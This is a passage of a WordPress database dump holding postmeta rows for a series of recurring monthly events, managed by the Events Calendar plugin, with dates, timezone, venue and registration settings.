10:15:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(118221,262875,'_tribe_modified_fields','a:19:{s:16:\"protect_children\";i:1607513499;s:12:\"_EventOrigin\";i:1607513499;s:13:\"_thumbnail_id\";i:1607513499;s:26:\"_RTECregistrationsDisabled\";i:1607513499;s:17:\"_RTECdeadlineType\";i:1607513499;s:19:\"_RTECwhoCanRegister\";i:1607513499;s:23:\"_RTEClimitRegistrations\";i:1607513499;s:21:\"_RTECmaxRegistrations\";i:1607513499;s:24:\"boldgrid_hide_page_title\";i:1607513499;s:16:\"_EventRecurrence\";i:1607513499;s:17:\"_EventShowMapLink\";i:1607513499;s:13:\"_EventShowMap\";i:1607513499;s:13:\"_EventVenueID\";i:1607513499;s:20:\"_EventCurrencySymbol\";i:1607513499;s:22:\"_EventCurrencyPosition\";i:1607513499;s:10:\"_EventCost\";i:1607513499;s:9:\"_EventURL\";i:1607513499;s:14:\"_EventTimezone\";i:1607513499;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607513499;}'),(118868,262955,'_RTEClimitRegistrations','0'),(118201,262874,'protect_children',''),(118202,262874,'_tribe_modified_fields','a:19:{s:16:\"protect_children\";i:1607513499;s:12:\"_EventOrigin\";i:1607513499;s:13:\"_thumbnail_id\";i:1607513499;s:26:\"_RTECregistrationsDisabled\";i:1607513499;s:17:\"_RTECdeadlineType\";i:1607513499;s:19:\"_RTECwhoCanRegister\";i:1607513499;s:23:\"_RTEClimitRegistrations\";i:1607513499;s:21:\"_RTECmaxRegistrations\";i:1607513499;s:24:\"boldgrid_hide_page_title\";i:1607513499;s:16:\"_EventRecurrence\";i:1607513499;s:17:\"_EventShowMapLink\";i:1607513499;s:13:\"_EventShowMap\";i:1607513499;s:13:\"_EventVenueID\";i:1607513499;s:20:\"_EventCurrencySymbol\";i:1607513499;s:22:\"_EventCurrencyPosition\";i:1607513499;s:10:\"_EventCost\";i:1607513499;s:9:\"_EventURL\";i:1607513499;s:14:\"_EventTimezone\";i:1607513499;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607513499;}'),(118209,262874,'_RTECmaxRegistrations','30'),(118210,262874,'boldgrid_hide_page_title','0'),(117009,262880,'_EventDuration','4500'),(118626,262911,'protect_children',''),(117006,262880,'_EventStartDateUTC','2021-10-03 17:30:00'),(118667,262913,'_tribe_modified_fields','a:19:{s:16:\"protect_children\";i:1607513875;s:12:\"_EventOrigin\";i:1607513875;s:26:\"_RTECregistrationsDisabled\";i:1607513875;s:17:\"_RTECdeadlineType\";i:1607513875;s:19:\"_RTECwhoCanRegister\";i:1607513875;s:23:\"_RTEClimitRegistrations\";i:1607513875;s:21:\"_RTECmaxRegistrations\";i:1607513875;s:24:\"boldgrid_hide_page_title\";i:1607513875;s:16:\"_EventRecurrence\";i:1607513875;s:17:\"_EventShowMapLink\";i:1607513875;s:13:\"_EventShowMap\";i:1607513875;s:13:\"_EventVenueID\";i:1607513875;s:20:\"_EventCurrencySymbol\";i:1607513875;s:22:\"_EventCurrencyPosition\";i:1607513875;s:10:\"_EventCost\";i:1607513875;s:9:\"_EventURL\";i:1607513875;s:14:\"_EventTimezone\";i:1607513875;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607513875;s:13:\"_thumbnail_id\";i:1607513875;}'),(118668,262913,'protect_children',''),(116855,262875,'_EventStartDate','2021-05-02 11:30:00'),(117008,262880,'_EventEndDateUTC','2021-10-03 18:45:00'),(116856,262875,'_EventStartDateUTC','2021-05-02 17:30:00'),(116857,262875,'_EventEndDate','2021-05-02 12:45:00'),(116858,262875,'_EventEndDateUTC','2021-05-02 18:45:00'),(117007,262880,'_EventEndDate','2021-10-03 12:45:00'),(116859,262875,'_EventDuration','4500'),(118242,262876,'_tribe_modified_fields','a:19:{s:16:\"protect_children\";i:1607513499;s:12:\"_EventOrigin\";i:1607513499;s:13:\"_thumbnail_id\";i:1607513499;s:26:\"_RTECregistrationsDisabled\";i:1607513499;s:17:\"_RTECdeadlineType\";i:1607513499;s:19:\"_RTECwhoCanRegister\";i:1607513499;s:23:\"_RTEClimitRegistrations\";i:1607513499;s:21:\"_RTECmaxRegistrations\";i:1607513499;s:24:\"boldgrid_hide_page_title\";i:1607513499;s:16:\"_EventRecurrence\";i:1607513499;s:17:\"_EventShowMapLink\";i:1607513499;s:13:\"_EventShowMap\";i:1607513499;s:13:\"_EventVenueID\";i:1607513499;s:20:\"_EventCurrencySymbol\";i:1607513499;s:22:\"_EventCurrencyPosition\";i:1607513499;s:10:\"_EventCost\";i:1607513499;s:9:\"_EventURL\";i:1607513499;s:14:\"_EventTimezone\";i:1607513499;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607513499;}'),(118238,262875,'_EventCost',''),(118239,262875,'_EventURL',''),(118240,262875,'_EventTimezone','America/Denver'),(118241,262875,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:0:{}s:6:\"update\";a:10:{i:262871;a:2:{s:9:\"timestamp\";i:1609673400;s:8:\"duration\";i:4500;}i:262872;a:2:{s:9:\"timestamp\";i:1612697400;s:8:\"duration\";i:4500;}i:262873;a:2:{s:9:\"timestamp\";i:1615116600;s:8:\"duration\";i:4500;}i:262874;a:2:{s:9:\"timestamp\";i:1617535800;s:8:\"duration\";i:4500;}i:262875;a:2:{s:9:\"timestamp\";i:1619955000;s:8:\"duration\";i:4500;}i:262876;a:2:{s:9:\"timestamp\";i:1622979000;s:8:\"duration\";i:4500;}i:262877;a:2:{s:9:\"timestamp\";i:1625398200;s:8:\"duration\";i:4500;}i:262878;a:2:{s:9:\"timestamp\";i:1627817400;s:8:\"duration\";i:4500;}i:262879;a:2:{s:9:\"timestamp\";i:1630841400;s:8:\"duration\";i:4500;}i:262880;a:2:{s:9:\"timestamp\";i:1633260600;s:8:\"duration\";i:4500;}}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:10;}'),(118226,262875,'_RTECregistrationsDisabled','1'),(118227,262875,'_RTECdeadlineType','start'),(118228,262875,'_RTECwhoCanRegister','any'),(118229,262875,'_RTEClimitRegistrations','0'),(118224,262875,'_EventOrigin','events-calendar'),(118232,262875,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:5:\"First\";s:3:\"day\";s:1:\"7\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-03\";s:14:\"EventStartDate\";s:19:\"2020-12-06 11:30:00\";s:12:\"EventEndDate\";s:19:\"2020-12-06 12:45:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(118233,262875,'_EventShowMapLink','1'),(118237,262875,'_EventCurrencyPosition','prefix'),(118234,262875,'_EventShowMap','1'),(118235,262875,'_EventVenueID','262507'),(118236,262875,'_EventCurrencySymbol',''),(118222,262875,'protect_children',''),(118223,262875,'_tribe_modified_fields','a:19:{s:16:\"protect_children\";i:1607513499;s:12:\"_EventOrigin\";i:1607513499;s:13:\"_thumbnail_id\";i:1607513499;s:26:\"_RTECregistrationsDisabled\";i:1607513499;s:17:\"_RTECdeadlineType\";i:1607513499;s:19:\"_RTECwhoCanRegister\";i:1607513499;s:23:\"_RTEClimitRegistrations\";i:1607513499;s:21:\"_RTECmaxRegistrations\";i:1607513499;s:24:\"boldgrid_hide_page_title\";i:1607513499;s:16:\"_EventRecurrence\";i:1607513499;s:17:\"_EventShowMapLink\";i:1607513499;s:13:\"_EventShowMap\";i:1607513499;s:13:\"_EventVenueID\";i:1607513499;s:20:\"_EventCurrencySymbol\";i:1607513499;s:22:\"_EventCurrencyPosition\";i:1607513499;s:10:\"_EventCost\";i:1607513499;s:9:\"_EventURL\";i:1607513499;s:14:\"_EventTimezone\";i:1607513499;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607513499;}'),(118230,262875,'_RTECmaxRegistrations','30'),(118231,262875,'boldgrid_hide_page_title','0'),(117005,262880,'_EventStartDate','2021-10-03 11:30:00'),(118688,262914,'_tribe_modified_fields','a:19:{s:16:\"protect_children\";i:1607513875;s:12:\"_EventOrigin\";i:1607513875;s:26:\"_RTECregistrationsDisabled\";i:1607513875;s:17:\"_RTECdeadlineType\";i:1607513875;s:19:\"_RTECwhoCanRegister\";i:1607513875;s:23:\"_RTEClimitRegistrations\";i:1607513875;s:21:\"_RTECmaxRegistrations\";i:1607513875;s:24:\"boldgrid_hide_page_title\";i:1607513875;s:16:\"_EventRecurrence\";i:1607513875;s:17:\"_EventShowMapLink\";i:1607513875;s:13:\"_EventShowMap\";i:1607513875;s:13:\"_EventVenueID\";i:1607513875;s:20:\"_EventCurrencySymbol\";i:1607513875;s:22:\"_EventCurrencyPosition\";i:1607513875;s:10:\"_EventCost\";i:1607513875;s:9:\"_EventURL\";i:1607513875;s:14:\"_EventTimezone\";i:1607513875;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607513875;s:13:\"_thumbnail_id\";i:1607513875;}'),(116885,262876,'_EventStartDate','2021-06-06 11:30:00'),(118647,262912,'protect_children',''),(116886,262876,'_EventStartDateUTC','2021-06-06 17:30:00'),(116887,262876,'_EventEndDate','2021-06-06 12:45:00'),(118646,262912,'_tribe_modified_fields','a:19:{s:16:\"protect_children\";i:1607513875;s:12:\"_EventOrigin\";i:1607513875;s:26:\"_RTECregistrationsDisabled\";i:1607513875;s:17:\"_RTECdeadlineType\";i:1607513875;s:19:\"_RTECwhoCanRegister\";i:1607513875;s:23:\"_RTEClimitRegistrations\";i:1607513875;s:21:\"_RTECmaxRegistrations\";i:1607513875;s:24:\"boldgrid_hide_page_title\";i:1607513875;s:16:\"_EventRecurrence\";i:1607513875;s:17:\"_EventShowMapLink\";i:1607513875;s:13:\"_EventShowMap\";i:1607513875;s:13:\"_EventVenueID\";i:1607513875;s:20:\"_EventCurrencySymbol\";i:1607513875;s:22:\"_EventCurrencyPosition\";i:1607513875;s:10:\"_EventCost\";i:1607513875;s:9:\"_EventURL\";i:1607513875;s:14:\"_EventTimezone\";i:1607513875;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607513875;s:13:\"_thumbnail_id\";i:1607513875;}'),(116888,262876,'_EventEndDateUTC','2021-06-06 18:45:00'),(118831,262954,'_tribe_modified_fields','a:20:{s:12:\"_EventOrigin\";i:1607545353;s:16:\"protect_children\";i:1607545353;s:13:\"_thumbnail_id\";i:1607545353;s:26:\"_RTECregistrationsDisabled\";i:1607545353;s:17:\"_RTECdeadlineType\";i:1607545353;s:19:\"_RTECwhoCanRegister\";i:1607545353;s:23:\"_RTEClimitRegistrations\";i:1607545353;s:21:\"_RTECmaxRegistrations\";i:1607545353;s:24:\"boldgrid_hide_page_title\";i:1607545353;s:16:\"_EventRecurrence\";i:1607545353;s:17:\"_EventShowMapLink\";i:1607545353;s:13:\"_EventShowMap\";i:1607545353;s:13:\"_EventVenueID\";i:1607545353;s:20:\"_EventCurrencySymbol\";i:1607545353;s:22:\"_EventCurrencyPosition\";i:1607545353;s:10:\"_EventCost\";i:1607545353;s:9:\"_EventURL\";i:1607545353;s:14:\"_EventTimezone\";i:1607545353;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607545353;s:16:\"tribe_events_cat\";i:1607570553;}'),(116889,262876,'_EventDuration','4500'),(151793,266079,'smush-info','The file was compressed from 62.91 KB to 60.18 KB saving 4.34 percent using WP-Optimize'),(118247,262876,'_RTECregistrationsDisabled','1'),(118248,262876,'_RTECdeadlineType','start'),(118249,262876,'_RTECwhoCanRegister','any'),(118250,262876,'_RTEClimitRegistrations','0'),(118245,262876,'_EventOrigin','events-calendar'),(118253,262876,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:5:\"First\";s:3:\"day\";s:1:\"7\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-03\";s:14:\"EventStartDate\";s:19:\"2020-12-06 11:30:00\";s:12:\"EventEndDate\";s:19:\"2020-12-06 12:45:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(118254,262876,'_EventShowMapLink','1'),(118255,262876,'_EventShowMap','1'),(118256,262876,'_EventVenueID','262507'),(118257,262876,'_EventCurrencySymbol',''),(118258,262876,'_EventCurrencyPosition','prefix'),(118259,262876,'_EventCost',''),(118260,262876,'_EventURL',''),(118261,262876,'_EventTimezone','America/Denver'),(118262,262876,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:0:{}s:6:\"update\";a:10:{i:262871;a:2:{s:9:\"timestamp\";i:1609673400;s:8:\"duration\";i:4500;}i:262872;a:2:{s:9:\"timestamp\";i:1612697400;s:8:\"duration\";i:4500;}i:262873;a:2:{s:9:\"timestamp\";i:1615116600;s:8:\"duration\";i:4500;}i:262874;a:2:{s:9:\"timestamp\";i:1617535800;s:8:\"duration\";i:4500;}i:262875;a:2:{s:9:\"timestamp\";i:1619955000;s:8:\"duration\";i:4500;}i:262876;a:2:{s:9:\"timestamp\";i:1622979000;s:8:\"duration\";i:4500;}i:262877;a:2:{s:9:\"timestamp\";i:1625398200;s:8:\"duration\";i:4500;}i:262878;a:2:{s:9:\"timestamp\";i:1627817400;s:8:\"duration\";i:4500;}i:262879;a:2:{s:9:\"timestamp\";i:1630841400;s:8:\"duration\";i:4500;}i:262880;a:2:{s:9:\"timestamp\";i:1633260600;s:8:\"duration\";i:4500;}}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:10;}'),(118850,262954,'_EventTimezone','America/Denver'),(118263,262877,'_tribe_modified_fields','a:19:{s:16:\"protect_children\";i:1607513499;s:12:\"_EventOrigin\";i:1607513499;s:13:\"_thumbnail_id\";i:1607513499;s:26:\"_RTECregistrationsDisabled\";i:1607513499;s:17:\"_RTECdeadlineType\";i:1607513499;s:19:\"_RTECwhoCanRegister\";i:1607513499;s:23:\"_RTEClimitRegistrations\";i:1607513499;s:21:\"_RTECmaxRegistrations\";i:1607513499;s:24:\"boldgrid_hide_page_title\";i:1607513499;s:16:\"_EventRecurrence\";i:1607513499;s:17:\"_EventShowMapLink\";i:1607513499;s:13:\"_EventShowMap\";i:1607513499;s:13:\"_EventVenueID\";i:1607513499;s:20:\"_EventCurrencySymbol\";i:1607513499;s:22:\"_EventCurrencyPosition\";i:1607513499;s:10:\"_EventCost\";i:1607513499;s:9:\"_EventURL\";i:1607513499;s:14:\"_EventTimezone\";i:1607513499;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607513499;}'),(118243,262876,'protect_children',''),(118244,262876,'_tribe_modified_fields','a:19:{s:16:\"protect_children\";i:1607513499;s:12:\"_EventOrigin\";i:1607513499;s:13:\"_thumbnail_id\";i:1607513499;s:26:\"_RTECregistrationsDisabled\";i:1607513499;s:17:\"_RTECdeadlineType\";i:1607513499;s:19:\"_RTECwhoCanRegister\";i:1607513499;s:23:\"_RTEClimitRegistrations\";i:1607513499;s:21:\"_RTECmaxRegistrations\";i:1607513499;s:24:\"boldgrid_hide_page_title\";i:1607513499;s:16:\"_EventRecurrence\";i:1607513499;s:17:\"_EventShowMapLink\";i:1607513499;s:13:\"_EventShowMap\";i:1607513499;s:13:\"_EventVenueID\";i:1607513499;s:20:\"_EventCurrencySymbol\";i:1607513499;s:22:\"_EventCurrencyPosition\";i:1607513499;s:10:\"_EventCost\";i:1607513499;s:9:\"_EventURL\";i:1607513499;s:14:\"_EventTimezone\";i:1607513499;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607513499;}'),(118251,262876,'_RTECmaxRegistrations','30'),(118252,262876,'boldgrid_hide_page_title','0'),(116915,262877,'_EventStartDate','2021-07-04 11:30:00'),(118584,262909,'protect_children',''),(116916,262877,'_EventStartDateUTC','2021-07-04 17:30:00'),(118306,262879,'protect_children',''),(116917,262877,'_EventEndDate','2021-07-04 12:45:00'),(118307,262879,'_tribe_modified_fields','a:19:{s:16:\"protect_children\";i:1607513499;s:12:\"_EventOrigin\";i:1607513499;s:13:\"_thumbnail_id\";i:1607513499;s:26:\"_RTECregistrationsDisabled\";i:1607513499;s:17:\"_RTECdeadlineType\";i:1607513499;s:19:\"_RTECwhoCanRegister\";i:1607513499;s:23:\"_RTEClimitRegistrations\";i:1607513499;s:21:\"_RTECmaxRegistrations\";i:1607513499;s:24:\"boldgrid_hide_page_title\";i:1607513499;s:16:\"_EventRecurrence\";i:1607513499;s:17:\"_EventShowMapLink\";i:1607513499;s:13:\"_EventShowMap\";i:1607513499;s:13:\"_EventVenueID\";i:1607513499;s:20:\"_EventCurrencySymbol\";i:1607513499;s:22:\"_EventCurrencyPosition\";i:1607513499;s:10:\"_EventCost\";i:1607513499;s:9:\"_EventURL\";i:1607513499;s:14:\"_EventTimezone\";i:1607513499;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607513499;}'),(116918,262877,'_EventEndDateUTC','2021-07-04 18:45:00'),(116919,262877,'_EventDuration','4500'),(118851,262954,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:10:{i:0;a:2:{s:9:\"timestamp\";i:1610269200;s:8:\"duration\";i:4500;}i:1;a:2:{s:9:\"timestamp\";i:1613293200;s:8:\"duration\";i:4500;}i:2;a:2:{s:9:\"timestamp\";i:1615712400;s:8:\"duration\";i:4500;}i:3;a:2:{s:9:\"timestamp\";i:1618131600;s:8:\"duration\";i:4500;}i:4;a:2:{s:9:\"timestamp\";i:1620550800;s:8:\"duration\";i:4500;}i:5;a:2:{s:9:\"timestamp\";i:1623574800;s:8:\"duration\";i:4500;}i:6;a:2:{s:9:\"timestamp\";i:1625994000;s:8:\"duration\";i:4500;}i:7;a:2:{s:9:\"timestamp\";i:1628413200;s:8:\"duration\";i:4500;}i:8;a:2:{s:9:\"timestamp\";i:1631437200;s:8:\"duration\";i:4500;}i:9;a:2:{s:9:\"timestamp\";i:1633856400;s:8:\"duration\";i:4500;}}s:6:\"update\";a:0:{}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:10;}'),(118848,262954,'_EventCost',''),(118284,262878,'_tribe_modified_fields','a:19:{s:16:\"protect_children\";i:1607513499;s:12:\"_EventOrigin\";i:1607513499;s:13:\"_thumbnail_id\";i:1607513499;s:26:\"_RTECregistrationsDisabled\";i:1607513499;s:17:\"_RTECdeadlineType\";i:1607513499;s:19:\"_RTECwhoCanRegister\";i:1607513499;s:23:\"_RTEClimitRegistrations\";i:1607513499;s:21:\"_RTECmaxRegistrations\";i:1607513499;s:24:\"boldgrid_hide_page_title\";i:1607513499;s:16:\"_EventRecurrence\";i:1607513499;s:17:\"_EventShowMapLink\";i:1607513499;s:13:\"_EventShowMap\";i:1607513499;s:13:\"_EventVenueID\";i:1607513499;s:20:\"_EventCurrencySymbol\";i:1607513499;s:22:\"_EventCurrencyPosition\";i:1607513499;s:10:\"_EventCost\";i:1607513499;s:9:\"_EventURL\";i:1607513499;s:14:\"_EventTimezone\";i:1607513499;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607513499;}'),(151792,266079,'smush-complete','1'),(118268,262877,'_RTECregistrationsDisabled','1'),(118269,262877,'_RTECdeadlineType','start'),(118270,262877,'_RTECwhoCanRegister','any'),(118271,262877,'_RTEClimitRegistrations','0'),(118272,262877,'_RTECmaxRegistrations','30'),(118266,262877,'_EventOrigin','events-calendar'),(118273,262877,'boldgrid_hide_page_title','0'),(118274,262877,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:5:\"First\";s:3:\"day\";s:1:\"7\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-03\";s:14:\"EventStartDate\";s:19:\"2020-12-06 11:30:00\";s:12:\"EventEndDate\";s:19:\"2020-12-06 12:45:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(118275,262877,'_EventShowMapLink','1'),(118276,262877,'_EventShowMap','1'),(118277,262877,'_EventVenueID','262507'),(118278,262877,'_EventCurrencySymbol',''),(118279,262877,'_EventCurrencyPosition','prefix'),(118280,262877,'_EventCost',''),(118281,262877,'_EventURL',''),(118282,262877,'_EventTimezone','America/Denver'),(118283,262877,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:0:{}s:6:\"update\";a:10:{i:262871;a:2:{s:9:\"timestamp\";i:1609673400;s:8:\"duration\";i:4500;}i:262872;a:2:{s:9:\"timestamp\";i:1612697400;s:8:\"duration\";i:4500;}i:262873;a:2:{s:9:\"timestamp\";i:1615116600;s:8:\"duration\";i:4500;}i:262874;a:2:{s:9:\"timestamp\";i:1617535800;s:8:\"duration\";i:4500;}i:262875;a:2:{s:9:\"timestamp\";i:1619955000;s:8:\"duration\";i:4500;}i:262876;a:2:{s:9:\"timestamp\";i:1622979000;s:8:\"duration\";i:4500;}i:262877;a:2:{s:9:\"timestamp\";i:1625398200;s:8:\"duration\";i:4500;}i:262878;a:2:{s:9:\"timestamp\";i:1627817400;s:8:\"duration\";i:4500;}i:262879;a:2:{s:9:\"timestamp\";i:1630841400;s:8:\"duration\";i:4500;}i:262880;a:2:{s:9:\"timestamp\";i:1633260600;s:8:\"duration\";i:4500;}}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:10;}'),(118264,262877,'protect_children',''),(118265,262877,'_tribe_modified_fields','a:19:{s:16:\"protect_children\";i:1607513499;s:12:\"_EventOrigin\";i:1607513499;s:13:\"_thumbnail_id\";i:1607513499;s:26:\"_RTECregistrationsDisabled\";i:1607513499;s:17:\"_RTECdeadlineType\";i:1607513499;s:19:\"_RTECwhoCanRegister\";i:1607513499;s:23:\"_RTEClimitRegistrations\";i:1607513499;s:21:\"_RTECmaxRegistrations\";i:1607513499;s:24:\"boldgrid_hide_page_title\";i:1607513499;s:16:\"_EventRecurrence\";i:1607513499;s:17:\"_EventShowMapLink\";i:1607513499;s:13:\"_EventShowMap\";i:1607513499;s:13:\"_EventVenueID\";i:1607513499;s:20:\"_EventCurrencySymbol\";i:1607513499;s:22:\"_EventCurrencyPosition\";i:1607513499;s:10:\"_EventCost\";i:1607513499;s:9:\"_EventURL\";i:1607513499;s:14:\"_EventTimezone\";i:1607513499;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607513499;}'),(116945,262878,'_EventStartDate','2021-08-01 11:30:00'),(116946,262878,'_EventStartDateUTC','2021-08-01 17:30:00'),(116947,262878,'_EventEndDate','2021-08-01 12:45:00'),(116948,262878,'_EventEndDateUTC','2021-08-01 18:45:00'),(116949,262878,'_EventDuration','4500'),(118849,262954,'_EventURL',''),(118305,262879,'_tribe_modified_fields','a:19:{s:16:\"protect_children\";i:1607513499;s:12:\"_EventOrigin\";i:1607513499;s:13:\"_thumbnail_id\";i:1607513499;s:26:\"_RTECregistrationsDisabled\";i:1607513499;s:17:\"_RTECdeadlineType\";i:1607513499;s:19:\"_RTECwhoCanRegister\";i:1607513499;s:23:\"_RTEClimitRegistrations\";i:1607513499;s:21:\"_RTECmaxRegistrations\";i:1607513499;s:24:\"boldgrid_hide_page_title\";i:1607513499;s:16:\"_EventRecurrence\";i:1607513499;s:17:\"_EventShowMapLink\";i:1607513499;s:13:\"_EventShowMap\";i:1607513499;s:13:\"_EventVenueID\";i:1607513499;s:20:\"_EventCurrencySymbol\";i:1607513499;s:22:\"_EventCurrencyPosition\";i:1607513499;s:10:\"_EventCost\";i:1607513499;s:9:\"_EventURL\";i:1607513499;s:14:\"_EventTimezone\";i:1607513499;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607513499;}'),(118303,262878,'_EventTimezone','America/Denver'),(118304,262878,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:0:{}s:6:\"update\";a:10:{i:262871;a:2:{s:9:\"timestamp\";i:1609673400;s:8:\"duration\";i:4500;}i:262872;a:2:{s:9:\"timestamp\";i:1612697400;s:8:\"duration\";i:4500;}i:262873;a:2:{s:9:\"timestamp\";i:1615116600;s:8:\"duration\";i:4500;}i:262874;a:2:{s:9:\"timestamp\";i:1617535800;s:8:\"duration\";i:4500;}i:262875;a:2:{s:9:\"timestamp\";i:1619955000;s:8:\"duration\";i:4500;}i:262876;a:2:{s:9:\"timestamp\";i:1622979000;s:8:\"duration\";i:4500;}i:262877;a:2:{s:9:\"timestamp\";i:1625398200;s:8:\"duration\";i:4500;}i:262878;a:2:{s:9:\"timestamp\";i:1627817400;s:8:\"duration\";i:4500;}i:262879;a:2:{s:9:\"timestamp\";i:1630841400;s:8:\"duration\";i:4500;}i:262880;a:2:{s:9:\"timestamp\";i:1633260600;s:8:\"duration\";i:4500;}}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:10;}'),(118289,262878,'_RTECregistrationsDisabled','1'),(118290,262878,'_RTECdeadlineType','start'),(118291,262878,'_RTECwhoCanRegister','any'),(118292,262878,'_RTEClimitRegistrations','0'),(118287,262878,'_EventOrigin','events-calendar'),(118295,262878,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:5:\"First\";s:3:\"day\";s:1:\"7\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-03\";s:14:\"EventStartDate\";s:19:\"2020-12-06 11:30:00\";s:12:\"EventEndDate\";s:19:\"2020-12-06 12:45:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(118296,262878,'_EventShowMapLink','1'),(118297,262878,'_EventShowMap','1'),(118298,262878,'_EventVenueID','262507'),(118299,262878,'_EventCurrencySymbol',''),(118300,262878,'_EventCurrencyPosition','prefix'),(118301,262878,'_EventCost',''),(118302,262878,'_EventURL',''),(118285,262878,'protect_children',''),(118286,262878,'_tribe_modified_fields','a:19:{s:16:\"protect_children\";i:1607513499;s:12:\"_EventOrigin\";i:1607513499;s:13:\"_thumbnail_id\";i:1607513499;s:26:\"_RTECregistrationsDisabled\";i:1607513499;s:17:\"_RTECdeadlineType\";i:1607513499;s:19:\"_RTECwhoCanRegister\";i:1607513499;s:23:\"_RTEClimitRegistrations\";i:1607513499;s:21:\"_RTECmaxRegistrations\";i:1607513499;s:24:\"boldgrid_hide_page_title\";i:1607513499;s:16:\"_EventRecurrence\";i:1607513499;s:17:\"_EventShowMapLink\";i:1607513499;s:13:\"_EventShowMap\";i:1607513499;s:13:\"_EventVenueID\";i:1607513499;s:20:\"_EventCurrencySymbol\";i:1607513499;s:22:\"_EventCurrencyPosition\";i:1607513499;s:10:\"_EventCost\";i:1607513499;s:9:\"_EventURL\";i:1607513499;s:14:\"_EventTimezone\";i:1607513499;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607513499;}'),(118293,262878,'_RTECmaxRegistrations','30'),(118294,262878,'boldgrid_hide_page_title','0'),(118625,262911,'_tribe_modified_fields','a:19:{s:16:\"protect_children\";i:1607513875;s:12:\"_EventOrigin\";i:1607513875;s:26:\"_RTECregistrationsDisabled\";i:1607513875;s:17:\"_RTECdeadlineType\";i:1607513875;s:19:\"_RTECwhoCanRegister\";i:1607513875;s:23:\"_RTEClimitRegistrations\";i:1607513875;s:21:\"_RTECmaxRegistrations\";i:1607513875;s:24:\"boldgrid_hide_page_title\";i:1607513875;s:16:\"_EventRecurrence\";i:1607513875;s:17:\"_EventShowMapLink\";i:1607513875;s:13:\"_EventShowMap\";i:1607513875;s:13:\"_EventVenueID\";i:1607513875;s:20:\"_EventCurrencySymbol\";i:1607513875;s:22:\"_EventCurrencyPosition\";i:1607513875;s:10:\"_EventCost\";i:1607513875;s:9:\"_EventURL\";i:1607513875;s:14:\"_EventTimezone\";i:1607513875;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607513875;s:13:\"_thumbnail_id\";i:1607513875;}'),(116975,262879,'_EventStartDate','2021-09-05 11:30:00'),(116976,262879,'_EventStartDateUTC','2021-09-05 17:30:00'),(116977,262879,'_EventEndDate','2021-09-05 